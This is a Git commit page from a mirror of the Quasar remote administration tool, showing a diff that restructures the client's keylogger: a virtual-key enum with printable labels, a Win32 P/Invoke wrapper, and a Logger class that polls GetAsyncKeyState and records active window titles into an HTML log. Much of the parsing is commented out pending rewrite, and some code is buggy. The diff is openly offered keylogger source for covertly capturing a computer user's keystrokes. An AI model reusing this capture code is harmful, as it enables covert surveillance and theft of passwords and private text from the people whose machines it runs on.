quasar
/
Quasar
mirror of https://github.com/quasar/Quasar.git
1
0
Fork 0
Code Issues Projects Releases Wiki Activity

Initial big changes to Keylogger 

Big changes to the Keylogger. Still needs lots of changes but my intent
should be visible by these changes. This is now very flexible, easy to
change and add keys, etc.
This commit is contained in:
yankejustin 2015-05-08 14:08:39 -04:00
parent b59cee6025
commit 0ab83c4917
6 changed files with 1052 additions and 110 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

4
Client/Client.csproj
View File

@ -64,6 +64,10 @@
<Compile Include="Core\Information\OSInfo.cs" /> <Compile Include="Core\Information\OSInfo.cs" />
<Compile Include="Core\Compression\JpgCompression.cs" /> <Compile Include="Core\Compression\JpgCompression.cs" />
<Compile Include="Core\Extensions\SocketExtensions.cs" /> <Compile Include="Core\Extensions\SocketExtensions.cs" />
<Compile Include="Core\Keylogger\KeyloggerAttributes.cs" />
<Compile Include="Core\Keylogger\KeyloggerHelpers.cs" />
<Compile Include="Core\Keylogger\KeyloggerKeys.cs" />
<Compile Include="Core\Keylogger\Win32.cs" />
<Compile Include="Core\Packets\ClientPackets\DesktopResponse.cs" /> <Compile Include="Core\Packets\ClientPackets\DesktopResponse.cs" />
<Compile Include="Core\Packets\ClientPackets\DirectoryResponse.cs" /> <Compile Include="Core\Packets\ClientPackets\DirectoryResponse.cs" />
<Compile Include="Core\Packets\ClientPackets\DownloadFileResponse.cs" /> <Compile Include="Core\Packets\ClientPackets\DownloadFileResponse.cs" />

26
Client/Core/Keylogger/KeyloggerAttributes.cs Normal file
View File

@ -0,0 +1,26 @@
using System;
using System.Collections.Generic;
using System.Text;
namespace xClient.Core.Keylogger
{
[AttributeUsage(AttributeTargets.Enum, AllowMultiple = false)]
public class KeyloggerKey : Attribute
{
public string KeyName { get; private set; }
public bool IsSpecialKey { get; private set; }
/// <summary>
/// Constructs the attribute used by the keylogger
/// keys to hold data for them.
/// </summary>
/// <param name="PrintedName">The printed value of the key when converting
/// the specific key to its string value.</param>
/// <param name="IsSpecialKey">Determines if the key is a special key.</param>
internal KeyloggerKey(string PrintedName, bool _IsSpecialKey = false)
{
KeyName = PrintedName;
IsSpecialKey = _IsSpecialKey;
}
}
}

16
Client/Core/Keylogger/KeyloggerHelpers.cs Normal file
View File

@ -0,0 +1,16 @@
using System;
using System.Collections.Generic;
using System.Text;
using System.Reflection;
using xClient.Core.Keylogger;
namespace xClient.Core.Keylogger
{
public static class KeyloggerHelpers
{
public static byte GetKeyloggerKeyValue<T>(this Enum sender) where T : KeyloggerKey
{
return Convert.ToByte(sender);
}
}
}

871
Client/Core/Keylogger/KeyloggerKeys.cs Normal file
View File

@ -0,0 +1,871 @@
/*
*
* Key information was obtained from this reference:
* https://msdn.microsoft.com/en-us/library/windows/desktop/dd375731%28v=vs.85%29.aspx
*
*/
using System;
using System.Collections.Generic;
using System.Text;
namespace xClient.Core.Keylogger
{
/// <summary>
/// Contains various keys that the keylogger supports.
/// </summary>
// Add Flags attribute so we can treat these as elements
// that could be used in combination, instead of the usual
// treatment as mutually exclusive elements.
[Flags]
public enum KeyloggerKeys : byte
{
#region Mouse Buttons
/// <summary>
/// The left mouse button.
/// </summary>
VK_LBUTTON = 0x01,
/// <summary>
/// The right mouse button.
/// </summary>
VK_RBUTTON = 0x02,
/// <summary>
/// Middle mouse button (three-button mouse).
/// </summary>
VK_MBUTTON = 0x04,
/// <summary>
/// X1 mouse button.
/// </summary>
VK_XBUTTON1 = 0x05,
/// <summary>
/// X2 mouse button.
/// </summary>
VK_XBUTTON2 = 0x06,
#endregion
#region Common Keys
/// <summary>
/// Control-break processing.
/// </summary>
[KeyloggerKey("[CANCEL]", true)]
VK_CANCEL = 0x03,
/// <summary>
/// BACKSPACE key.
/// </summary>
[KeyloggerKey("[BACKSPACE]", true)]
VK_BACK = 0x08,
/// <summary>
/// TAB key.
/// </summary>
[KeyloggerKey("[TAB]", true)]
VK_TAB = 0x09,
/// <summary>
/// CLEAR key.
/// </summary>
[KeyloggerKey("[CLEAR]", true)]
VK_CLEAR = 0x0C,
/// <summary>
/// ENTER key.
/// </summary>
[KeyloggerKey("[ENTER]", true)]
VK_RETURN = 0x0D,
/// <summary>
/// SHIFT key.
/// </summary>
[KeyloggerKey("[SHIFT]", true)]
VK_SHIFT = 0x10,
/// <summary>
/// CONTROL (CTRL) key.
/// </summary>
[KeyloggerKey("[CTRL]", true)]
VK_CONTROL = 0x11,
/// <summary>
/// ALT key.
/// </summary>
[KeyloggerKey("[ALT]", true)]
VK_MENU = 0x12,
/// <summary>
/// PAUSE key.
/// </summary>
[KeyloggerKey("[PAUSE]", true)]
VK_PAUSE = 0x13,
/// <summary>
/// CAPS LOCK key.
/// </summary>
[KeyloggerKey("[CAPS]", true)]
VK_CAPITAL = 0x14,
/// <summary>
/// ESC key.
/// </summary>
[KeyloggerKey("[ESC]", true)]
VK_ESCAPE = 0x1B,
/// <summary>
/// SPACEBAR key.
/// </summary>
[KeyloggerKey("[SPACE]", true)]
VK_SPACE = 0x20,
/// <summary>
/// PAGE UP key.
/// </summary>
[KeyloggerKey("[PAGE_UP]", true)]
VK_PRIOR = 0x21,
/// <summary>
/// PAGE DOWN key.
/// </summary>
[KeyloggerKey("[PAGE_DOWN]", true)]
VK_NEXT = 0x22,
/// <summary>
/// END key.
/// </summary>
[KeyloggerKey("[END]", true)]
VK_END = 0x23,
/// <summary>
/// HOME key.
/// </summary>
[KeyloggerKey("[HOME]", true)]
VK_HOME = 0x24,
/// <summary>
/// LEFT ARROW key.
/// </summary>
[KeyloggerKey("[ARROW_LEFT]", true)]
VK_LEFT = 0x25,
/// <summary>
/// UP ARROW key.
/// </summary>
[KeyloggerKey("[ARROW_DOWN]", true)]
VK_UP = 0x26,
/// <summary>
/// RIGHT ARROW key.
/// </summary>
[KeyloggerKey("[ARROW_RIGHT]", true)]
VK_RIGHT = 0x27,
/// <summary>
/// DOWN ARROW key.
/// </summary>
[KeyloggerKey("[ARROW_DOWN]", true)]
VK_DOWN = 0x28,
/// <summary>
/// SELECT key.
/// </summary>
[KeyloggerKey("[SELECT]", true)]
VK_SELECT = 0x29,
/// <summary>
/// PRINT key.
/// </summary>
[KeyloggerKey("[PRINT]", true)]
VK_PRINT = 0x2A,
/// <summary>
/// EXECUTE key.
/// </summary>
[KeyloggerKey("[EXECUTE]", true)]
VK_EXECUTE = 0x2B,
/// <summary>
/// PRINT SCREEN key.
/// </summary>
[KeyloggerKey("[PRINT_SCREEN]", true)]
VK_SNAPSHOT = 0x2C,
/// <summary>
/// INSERT (INS) key.
/// </summary>
[KeyloggerKey("[INSERT]", true)]
VK_INSERT = 0x2D,
/// <summary>
/// DELETE (DEL) key.
/// </summary>
[KeyloggerKey("[DEL]", true)]
VK_DELETE = 0x2E,
/// <summary>
/// HELP key.
/// </summary>
[KeyloggerKey("[HELP]", true)]
VK_HELP = 0x2F,
#endregion
#region Number Keys
/// <summary>
/// 0 key.
/// </summary>
[KeyloggerKey("0")]
K_0 = 0x30,
/// <summary>
/// 1 key.
/// </summary>
[KeyloggerKey("1")]
K_1 = 0x31,
/// <summary>
/// 2 key.
/// </summary>
[KeyloggerKey("2")]
K_2 = 0x32,
/// <summary>
/// 3 key.
/// </summary>
[KeyloggerKey("3")]
K_3 = 0x33,
/// <summary>
/// 4 key.
/// </summary>
[KeyloggerKey("4")]
K_4 = 0x34,
/// <summary>
/// 5 key.
/// </summary>
[KeyloggerKey("5")]
K_5 = 0x35,
/// <summary>
/// 6 key.
/// </summary>
[KeyloggerKey("6")]
K_6 = 0x36,
/// <summary>
/// 7 key.
/// </summary>
[KeyloggerKey("7")]
K_7 = 0x37,
/// <summary>
/// 8 key.
/// </summary>
[KeyloggerKey("8")]
K_8 = 0x38,
/// <summary>
/// 9 key.
/// </summary>
[KeyloggerKey("9")]
K_9 = 0x39,
#endregion
#region Alpha Keys
/// <summary>
/// 'A' key.
/// </summary>
[KeyloggerKey("a")]
K_A = 0x41,
/// <summary>
/// 'B' key.
/// </summary>
[KeyloggerKey("b")]
K_B = 0x42,
/// <summary>
/// 'C' key.
/// </summary>
[KeyloggerKey("c")]
K_C = 0x43,
/// <summary>
/// 'D' key.
/// </summary>
[KeyloggerKey("d")]
K_D = 0x44,
/// <summary>
/// 'E' key.
/// </summary>
[KeyloggerKey("e")]
K_E = 0x45,
/// <summary>
/// 'F' key.
/// </summary>
[KeyloggerKey("f")]
K_F = 0x46,
/// <summary>
/// 'G' key.
/// </summary>
K_G = 0x47,
/// <summary>
/// 'H' key.
/// </summary>
K_H = 0x48,
/// <summary>
/// 'I' key.
/// </summary>
K_I = 0x49,
/// <summary>
/// 'J' key.
/// </summary>
K_J = 0x4A,
/// <summary>
/// 'K' key.
/// </summary>
K_K = 0x4B,
/// <summary>
/// 'L' key.
/// </summary>
K_L = 0x4C,
/// <summary>
/// 'M' key.
/// </summary>
K_M = 0x4D,
/// <summary>
/// 'N' key.
/// </summary>
K_N = 0x4E,
/// <summary>
/// 'O' key.
/// </summary>
K_O = 0x4F,
/// <summary>
/// 'P' key.
/// </summary>
K_P = 0x50,
/// <summary>
/// 'Q' key.
/// </summary>
K_Q = 0x51,
/// <summary>
/// 'R' key.
/// </summary>
K_R = 0x52,
/// <summary>
/// 'S' key.
/// </summary>
K_S = 0x53,
/// <summary>
/// 'T' key.
/// </summary>
K_T = 0x54,
/// <summary>
/// 'U' key.
/// </summary>
K_U = 0x55,
/// <summary>
/// 'V' key.
/// </summary>
K_V = 0x56,
/// <summary>
/// 'W' key.
/// </summary>
K_W = 0x57,
/// <summary>
/// 'X' key.
/// </summary>
K_X = 0x58,
/// <summary>
/// 'Y' key.
/// </summary>
K_Y = 0x59,
/// <summary>
/// 'Z' key.
/// </summary>
K_Z = 0x5A,
#endregion
#region Windows keys
/// <summary>
/// Left Windows key (Natural keyboard).
/// </summary>
VK_LWIN = 0x5B,
/// <summary>
/// Right Windows key (Natural keyboard).
/// </summary>
VK_RWIN = 0x5C,
/// <summary>
/// Applications key (natural keyboard).
/// </summary>
VK_APPS = 0x5D,
/// <summary>
/// Computer Sleep key.
/// </summary>
VK_SLEEP = 0x5F,
#endregion
#region Number Keys (Keypad)
/// <summary>
/// Numeric keypad 0 key.
/// </summary>
VK_NUMPAD0 = 0x60,
/// <summary>
/// Numeric keypad 1 key.
/// </summary>
VK_NUMPAD1 = 0x61,
/// <summary>
/// Numeric keypad 2 key.
/// </summary>
VK_NUMPAD2 = 0x62,
/// <summary>
/// Numeric keypad 3 key.
/// </summary>
VK_NUMPAD3 = 0x63,
/// <summary>
/// Numeric keypad 4 key.
/// </summary>
VK_NUMPAD4 = 0x64,
/// <summary>
/// Numeric keypad 5 key.
/// </summary>
VK_NUMPAD5 = 0x65,
/// <summary>
/// Numeric keypad 6 key.
/// </summary>
VK_NUMPAD6 = 0x66,
/// <summary>
/// Numeric keypad 7 key.
/// </summary>
VK_NUMPAD7 = 0x67,
/// <summary>
/// Numeric keypad 8 key.
/// </summary>
VK_NUMPAD8 = 0x68,
/// <summary>
/// Numeric keypad 0 key.
/// </summary>9
VK_NUMPAD9 = 0x69,
#endregion
#region Command Keys (Keypad)
/// <summary>
/// Multiply key.
/// </summary>
VK_MULTIPLY = 0x6A,
/// <summary>
/// Add key.
/// </summary>
VK_ADD = 0x6B,
/// <summary>
/// Separator key.
/// </summary>
VK_SEPARATOR = 0x6C,
/// <summary>
/// Subtract (-) key.
/// </summary>
VK_SUBTRACT = 0x6D,
/// <summary>
/// Decimal (.) key.
/// </summary>
VK_DECIMAL = 0x6E,
/// <summary>
/// Divide (/) key.
/// </summary>
VK_DIVIDE = 0x6F,
#endregion
#region Function Keys
/// <summary>
/// F1 key.
/// </summary>
VK_F1 = 0x70,
/// <summary>
/// F2 key.
/// </summary>
VK_F2 = 0x71,
/// <summary>
/// F3 key.
/// </summary>
VK_F3 = 0x72,
/// <summary>
/// F4 key.
/// </summary>
VK_F4 = 0x73,
/// <summary>
/// F5 key.
/// </summary>
VK_F5 = 0x74,
/// <summary>
/// F6 key.
/// </summary>
VK_F6 = 0x75,
/// <summary>
/// F7 key.
/// </summary>
VK_F7 = 0x76,
/// <summary>
/// F8 key.
/// </summary>
VK_F8 = 0x77,
/// <summary>
/// F9 key.
/// </summary>
VK_F9 = 0x78,
/// <summary>
/// F10 key.
/// </summary>
VK_F10 = 0x79,
/// <summary>
/// F11 key.
/// </summary>
VK_F11 = 0x7A,
/// <summary>
/// F12 key.
/// </summary>
VK_F12 = 0x7B,
/// <summary>
/// F13 key.
/// </summary>
VK_F13 = 0x7C,
/// <summary>
/// F14 key.
/// </summary>
VK_F14 = 0x7D,
/// <summary>
/// F15 key.
/// </summary>
VK_F15 = 0x7E,
/// <summary>
/// F16 key.
/// </summary>
VK_F16 = 0x7F,
/// <summary>
/// F17 key.
/// </summary>
VK_F17 = 0x80,
/// <summary>
/// F18 key.
/// </summary>
VK_F18 = 0x81,
/// <summary>
/// F19 key.
/// </summary>
VK_F19 = 0x82,
/// <summary>
/// F20 key.
/// </summary>
VK_F20 = 0x83,
/// <summary>
/// F21 key.
/// </summary>
VK_F21 = 0x84,
/// <summary>
/// F22 key.
/// </summary>
VK_F22 = 0x85,
/// <summary>
/// F23 key.
/// </summary>
VK_F23 = 0x86,
/// <summary>
/// F24 key.
/// </summary>
VK_F24 = 0x87,
#endregion
#region Various Command Keys
/// <summary>
/// NUM LOCK key.
/// </summary>
VK_NUMLOCK = 0x90,
/// <summary>
/// SCROLL LOCK key.
/// </summary>
VK_SCROLL = 0x91,
/// <summary>
/// Left SHIFT key.
/// </summary>
VK_LSHIFT = 0xA0,
/// <summary>
/// Right SHIFT key.
/// </summary>
VK_RSHIFT = 0xA1,
/// <summary>
/// Left CONTROL (CTRL) key.
/// </summary>
VK_LCONTROL = 0xA2,
/// <summary>
/// Right CONTROL (CTRL) key.
/// </summary>
VK_RCONTROL = 0xA3,
/// <summary>
/// Left MENU key.
/// </summary>
VK_LMENU = 0xA4,
/// <summary>
/// Right MENU key.
/// </summary>
VK_RMENU = 0xA5,
/// <summary>
/// Browser Back key.
/// </summary>
VK_BROWSER_BACK = 0xA6,
/// <summary>
/// Browser Forward key.
/// </summary>
VK_BROWSER_FORWARD = 0xA7,
/// <summary>
/// Browser Refresh key.
/// </summary>
VK_BROWSER_REFRESH = 0xA8,
/// <summary>
/// Browser Stop key.
/// </summary>
VK_BROWSER_STOP = 0xA9,
/// <summary>
/// Browser Search key.
/// </summary>
VK_BROWSER_SEARCH = 0xAA,
/// <summary>
/// Browser Favorites key.
/// </summary>
VK_BROWSER_FAVORITES = 0xAB,
/// <summary>
/// Browser Start and Home key.
/// </summary>
VK_BROWSER_HOME = 0xAC,
/// <summary>
/// Volume Mute key.
/// </summary>
VK_VOLUME_MUTE = 0xAD,
/// <summary>
/// Volume Down key.
/// </summary>
VK_VOLUME_DOWN = 0xAE,
/// <summary>
/// Volume Up key.
/// </summary>
VK_VOLUME_UP = 0xAF,
/// <summary>
/// Start Application 2 key.
/// </summary>
VK_LAUNCH_APP2 = 0xB7,
#endregion
#region Varying keys (based on locality)
/// <summary>
/// Used for miscellaneous characters; it
/// can vary by keyboard. For the US
/// standard keyboard, the ';:' key.
/// </summary>
VK_OEM_1 = 0xBA,
/// <summary>
/// For any country/region, the '+' key.
/// </summary>
VK_OEM_PLUS = 0xBB,
/// <summary>
/// For any country/region, the ',' key.
/// </summary>
VK_OEM_COMMA = 0xBC,
/// <summary>
/// For any country/region, the '-' key.
/// </summary>
VK_OEM_MINUS = 0xBD,
/// <summary>
/// For any country/region, the '.' key.
/// </summary>
VK_OEM_PERIOD = 0xBE,
/// <summary>
/// Used for miscellaneous characters; it can vary
/// by keyboard. For the US standard keyboard,
/// the '/?' key.
/// </summary>
VK_OEM_2 = 0xBF,
/// <summary>
/// Used for miscellaneous characters; it can vary
/// by keyboard. For the US standard keyboard,
/// the '`~' key.
/// </summary>
VK_OEM_3 = 0xC0,
/// <summary>
/// Used for miscellaneous characters; it can vary by
/// keyboard. For the US standard keyboard, the '[{' key.
/// </summary>
VK_OEM_4 = 0xDB,
/// <summary>
/// Used for miscellaneous characters; it can vary by keyboard.
/// For the US standard keyboard, the '\\|' key.
/// </summary>
VK_OEM_5 = 0xDC,
/// <summary>
/// Used for miscellaneous characters; it can vary by keyboard.
/// For the US standard keyboard, the ']}' key.
/// </summary>
VK_OEM_6 = 0xDD,
/// <summary>
/// Used for miscellaneous characters; it can vary by keyboard.
/// For the US standard keyboard, the 'single-quote/double-quote' key.
/// </summary>
VK_OEM_7 = 0xDE,
/// <summary>
/// Used for miscellaneous characters; it can vary by keyboard.
/// </summary>
VK_OEM_8 = 0xDF,
/// <summary>
/// Either the angle bracket key or the backslash key on the RT 102-key keyboard.
/// </summary>
VK_OEM_102 = 0xE2,
#endregion
#region Random
/// <summary>
/// Used to pass Unicode characters as if they were keystrokes.
/// The VK_PACKET key is the low word of a 32-bit Virtual Key
/// value used for non-keyboard input methods. For more
/// information, see Remark in KEYBDINPUT, SendInput,
/// WM_KEYDOWN, and WM_KEYUP.
/// </summary>
VK_PACKET = 0xE7,
/// <summary>
/// ERASE EOF key.
/// </summary>
VK_EREOF = 0xF9,
/// <summary>
/// Play key.
/// </summary>
VK_PLAY = 0xFA,
/// <summary>
/// Zoom key.
/// </summary>
VK_ZOOM = 0xFB,
/// <summary>
/// PA1 key.
/// </summary>
VK_PA1 = 0xFD,
/// <summary>
/// Clear key.
/// </summary>
VK_OEM_CLEAR = 0xFE,
#endregion
}
}

195
Client/Core/Keylogger/Logger.cs
View File

@ -5,46 +5,17 @@ using System.Runtime.InteropServices;
using System.Text; using System.Text;
using System.Threading; using System.Threading;
using System.Windows.Forms; using System.Windows.Forms;
using xClient.Core.Keylogger;
namespace xClient.Core.Keylogger namespace xClient.Core.Keylogger
{ {
public class KeyData public struct LoggedKey
{ {
public short Value { get; set; } public KeyloggerKeys PressedChar { get; set; }
public bool ShiftKey { get; set; }
public bool CapsLock { get; set; }
public bool ControlKey { get; set; }
public bool AltKey { get; set; }
} }
public class Logger public class Logger
{ {
#region "WIN32API"
[DllImport("user32.dll")]
private static extern short GetAsyncKeyState(Keys vKey);
[DllImport("user32.dll")]
private static extern short GetAsyncKeyState(int vKey);
[DllImport("user32.dll", CharSet = CharSet.Unicode, SetLastError = true)]
private static extern int GetWindowText(IntPtr hWnd, StringBuilder lpString, int nMaxCount);
[DllImport("user32.dll", CharSet = CharSet.Unicode)]
private static extern int ToUnicodeEx(int wVirtKey, uint wScanCode, byte[] lpKeyState, StringBuilder pwszBuff,
int cchBuff, uint wFlags, IntPtr dwhkl);
[DllImport("user32.dll")]
private static extern IntPtr GetForegroundWindow();
[DllImport("user32.dll")]
private static extern uint GetWindowThreadProcessId(IntPtr hWnd, out uint lpdwProcessId);
[DllImport("user32.dll", ExactSpelling = true)]
internal static extern IntPtr GetKeyboardLayout(uint threadId);
#endregion
public static Logger Instance; public static Logger Instance;
public bool Enabled public bool Enabled
@ -60,7 +31,7 @@ namespace xClient.Core.Keylogger
{ {
get get
{ {
return Convert.ToBoolean(GetAsyncKeyState(Keys.ShiftKey) & 0x8000); //Returns true if shiftkey is pressed return Convert.ToBoolean(Win32.GetAsyncKeyState(Keys.ShiftKey) & 0x8000); //Returns true if shiftkey is pressed
} }
} }
@ -68,7 +39,7 @@ namespace xClient.Core.Keylogger
{ {
get get
{ {
return Convert.ToBoolean(GetAsyncKeyState(Keys.ControlKey) & 0x8000); //Returns true if controlkey is pressed return Convert.ToBoolean(Win32.GetAsyncKeyState(Keys.ControlKey) & 0x8000); //Returns true if controlkey is pressed
} }
} }
@ -76,7 +47,7 @@ namespace xClient.Core.Keylogger
{ {
get get
{ {
return Convert.ToBoolean(GetAsyncKeyState(Keys.Menu) & 0x8000); //Returns true if altkey is pressed return Convert.ToBoolean(Win32.GetAsyncKeyState(Keys.Menu) & 0x8000); //Returns true if altkey is pressed
} }
} }
@ -92,7 +63,7 @@ namespace xClient.Core.Keylogger
{ {
get get
{ {
return Convert.ToBoolean(GetAsyncKeyState(Keys.EscapeKey) & 0x8000); //Returns true if Escape is pressed return Convert.ToBoolean(Win32.GetAsyncKeyState(Keys.Escape) & 0x8000); //Returns true if Escape is pressed
} }
} }
@ -104,7 +75,7 @@ namespace xClient.Core.Keylogger
"\\Logs\\"; "\\Logs\\";
private readonly List<short> _enumValues; private readonly List<short> _enumValues;
private volatile List<KeyData> _keyBuffer; private volatile List<LoggedKey> _keyBuffer;
private readonly System.Timers.Timer _timerLogKeys; private readonly System.Timers.Timer _timerLogKeys;
private readonly System.Timers.Timer _timerEmptyKeyBuffer; private readonly System.Timers.Timer _timerEmptyKeyBuffer;
private readonly System.Timers.Timer _timerFlush; private readonly System.Timers.Timer _timerFlush;
@ -120,7 +91,7 @@ namespace xClient.Core.Keylogger
WriteFile(); WriteFile();
_keyBuffer = new List<KeyData>(); _keyBuffer = new List<LoggedKey>();
_enumValues = new List<short>() _enumValues = new List<short>()
//Populate enumValues list with the Virtual Key Codes of the keys we want to log //Populate enumValues list with the Virtual Key Codes of the keys we want to log
@ -178,67 +149,69 @@ namespace xClient.Core.Keylogger
private void timerEmptyKeyBuffer_Elapsed(object sender, System.Timers.ElapsedEventArgs e) private void timerEmptyKeyBuffer_Elapsed(object sender, System.Timers.ElapsedEventArgs e)
{ {
int j = 0; int j = 0;
KeyData[] keybuffer = new KeyData[_keyBuffer.Count]; LoggedKey[] keybuffer = new LoggedKey[_keyBuffer.Count];
_keyBuffer.CopyTo(keybuffer); _keyBuffer.CopyTo(keybuffer);
foreach (var k in keybuffer) foreach (var k in keybuffer)
{ {
if (k != null) if (k.PressedChar != null)
{ {
switch (k.Value) // TODO: RE-WRITE THE WAY IT IS PARSED.
{
case 8: //switch (k.PressedChar)
_logFileBuffer.Append(HighlightSpecialKey("Back")); //{
break; // case 8:
case 9: // _logFileBuffer.Append(HighlightSpecialKey("Back"));
_logFileBuffer.Append(HighlightSpecialKey("Tab")); // break;
break; // case 9:
case 13: // _logFileBuffer.Append(HighlightSpecialKey("Tab"));
_logFileBuffer.Append(HighlightSpecialKey("Enter")); // break;
break; // case 13:
case 32: // _logFileBuffer.Append(HighlightSpecialKey("Enter"));
_logFileBuffer.Append(" "); // break;
break; // case 32:
case 46: // _logFileBuffer.Append(" ");
_logFileBuffer.Append(HighlightSpecialKey("Del")); // break;
break; // case 46:
case 91: // _logFileBuffer.Append(HighlightSpecialKey("Del"));
case 92: // break;
_logFileBuffer.Append(HighlightSpecialKey("Win")); // case 91:
break; // case 92:
case 112: // _logFileBuffer.Append(HighlightSpecialKey("Win"));
case 113: // break;
case 114: // case 112:
case 115: // case 113:
case 116: // case 114:
case 117: // case 115:
case 118: // case 116:
case 119: // case 117:
case 120: // case 118:
case 121: // case 119:
case 122: // case 120:
_logFileBuffer.Append(HighlightSpecialKey("F" + (k.Value - 111))); // case 121:
break; // case 122:
default: // _logFileBuffer.Append(HighlightSpecialKey("F" + (k.Value - 111)));
if (_enumValues.Contains(k.Value)) // break;
{ // default:
if (k.ShiftKey || k.ControlKey || k.AltKey || k.EscapeKey) // if (_enumValues.Contains(k.Value))
{ // {
_logFileBuffer.Append( // if (k.ShiftKey || k.ControlKey || k.AltKey || k.EscapeKey)
HighlightSpecialKey( // {
((k.ShiftKey) ? "SHIFT-" : string.Empty) + // _logFileBuffer.Append(
((k.ControlKey) ? "CTRL-" : string.Empty) + // HighlightSpecialKey(
((k.AltKey) ? "ALT-" : string.Empty) + // ((k.ShiftKey) ? "SHIFT-" : string.Empty) +
((k.EscapeKey) ? "ESC-" : string.Empty) + // ((k.ControlKey) ? "CTRL-" : string.Empty) +
FromKeys(k.Value, k.ShiftKey, k.CapsLock) // ((k.AltKey) ? "ALT-" : string.Empty) +
)); // ((k.EscapeKey) ? "ESC-" : string.Empty) +
} // FromKeys(k.Value, k.ShiftKey, k.CapsLock)
else // ));
{ // }
_logFileBuffer.Append(FromKeys(k.Value, k.ShiftKey, k.CapsLock)); // else
} // {
} // _logFileBuffer.Append(FromKeys(k.Value, k.ShiftKey, k.CapsLock));
break; // }
} // }
// break;
//}
} }
j++; j++;
} }
@ -250,19 +223,21 @@ namespace xClient.Core.Keylogger
{ {
foreach (short i in _enumValues) //Loop through our enumValues list populated with the keys we want to log foreach (short i in _enumValues) //Loop through our enumValues list populated with the keys we want to log
{ {
if (GetAsyncKeyState(i) == -32767) //GetAsycKeyState returns -32767 to indicate keypress if (Win32.GetAsyncKeyState(i) == -32767) //GetAsycKeyState returns -32767 to indicate keypress
{ {
_keyBuffer.Add(new KeyData() {CapsLock = CapsLock, ShiftKey = ShiftKey, ControlKey = ControlKey, AltKey = AltKey, Value = i}); // TODO: RE-WRITE THE WAY THE KEYBUFFER ADDS A NEW LOGGED KEY.
_hWndTitle = GetActiveWindowTitle(); //Get active thread window title
if (_hWndTitle != null) //_keyBuffer.Add(new LoggedKey() { PressedChar = i });
{ //_hWndTitle = GetActiveWindowTitle(); //Get active thread window title
if (_hWndTitle != _hWndLastTitle && _enumValues.Contains(i)) //if (_hWndTitle != null)
//Only write title to log if a key is pressed that we support //{
{ // if (_hWndTitle != _hWndLastTitle && _enumValues.Contains(i))
_hWndLastTitle = _hWndTitle; // //Only write title to log if a key is pressed that we support
_logFileBuffer.Append("<br><br>[<b>" + _hWndTitle + "</b>]<br>"); // {
} // _hWndLastTitle = _hWndTitle;
} // _logFileBuffer.Append("<br><br>[<b>" + _hWndTitle + "</b>]<br>");
// }
//}
} }
} }
} }
@ -324,7 +299,7 @@ namespace xClient.Core.Keylogger
{ {
StringBuilder sbTitle = new StringBuilder(1024); StringBuilder sbTitle = new StringBuilder(1024);
GetWindowText(GetForegroundWindow(), sbTitle, sbTitle.Capacity); Win32.GetWindowText(Win32.GetForegroundWindow().ToInt32(), sbTitle, sbTitle.Capacity);
string title = sbTitle.ToString(); string title = sbTitle.ToString();
@ -334,7 +309,7 @@ namespace xClient.Core.Keylogger
private IntPtr GetActiveKeyboardLayout() private IntPtr GetActiveKeyboardLayout()
{ {
uint pid; uint pid;
return GetKeyboardLayout(GetWindowThreadProcessId(GetForegroundWindow(), out pid)); return Win32.GetKeyboardLayout(Win32.GetWindowThreadProcessId(Win32.GetForegroundWindow(), out pid));
} }
private char? FromKeys(int keys, bool shift, bool caps) private char? FromKeys(int keys, bool shift, bool caps)
@ -351,7 +326,7 @@ namespace xClient.Core.Keylogger
var sb = new StringBuilder(10); var sb = new StringBuilder(10);
return ToUnicodeEx(keys, 0, keyStates, sb, sb.Capacity, 0, GetActiveKeyboardLayout()) == 1 return Win32.ToUnicodeEx(keys, 0, keyStates, sb, sb.Capacity, 0, GetActiveKeyboardLayout()) == 1
? (char?) sb[0] ? (char?) sb[0]
: null; : null;
//Get the appropriate unicode character from the state of keyboard and from the Keyboard layout (language) of the active thread //Get the appropriate unicode character from the state of keyboard and from the Keyboard layout (language) of the active thread

50
Client/Core/Keylogger/Win32.cs Normal file
View File

@ -0,0 +1,50 @@
using System;
using System.Collections.Generic;
using System.IO;
using System.Runtime.InteropServices;
using System.Text;
using System.Threading;
using System.Windows.Forms;
namespace xClient.Core.Keylogger
{
public static class Win32
{
/// <summary>
/// Translates (maps) a virtual-key code into a scan code or character value,
/// or translates a scan code into a virtual-key code. The function
/// translates the codes using the input language and an input locale identifier.
/// </summary>
/// <param name="uCode">The virtual-key code or scan code for a key</param>
/// <param name="uMapType">The translation to perform.</param>
/// <param name="dwhkl"></param>
/// <returns>Returns </returns>
[DllImport("user32.dll", CharSet = CharSet.Unicode, EntryPoint = "MapVirtualKeyExW", ExactSpelling = true)]
internal static extern int MapVirtualKeyExW(int uCode, int uMapType, IntPtr dwhkl);
[DllImport("user32.dll")]
internal static extern short GetAsyncKeyState(Keys vKey);
// The value passed to GetAsyncKeyState is scan code, so we need to translate
// the data to virtual code, then to unicode character, then we can log to
// the file.
[DllImport("user32.dll")]
internal static extern short GetAsyncKeyState(int vKey);
[DllImport("user32.dll", CharSet = CharSet.Unicode, SetLastError = true)]
internal static extern int GetWindowText(int hWnd, StringBuilder lpString, int nMaxCount);
[DllImport("user32.dll", CharSet = CharSet.Unicode, ExactSpelling = true)]
internal static extern int ToUnicodeEx(int wVirtKey, uint wScanCode, byte[] lpKeyState, StringBuilder pwszBuff,
int cchBuff, uint wFlags, IntPtr dwhkl);
[DllImport("user32.dll")]
internal static extern IntPtr GetForegroundWindow();
[DllImport("user32.dll")]
internal static extern uint GetWindowThreadProcessId(IntPtr hWnd, out uint lpdwProcessId);
[DllImport("user32.dll", ExactSpelling = true)]
internal static extern IntPtr GetKeyboardLayout(uint threadId);
}
}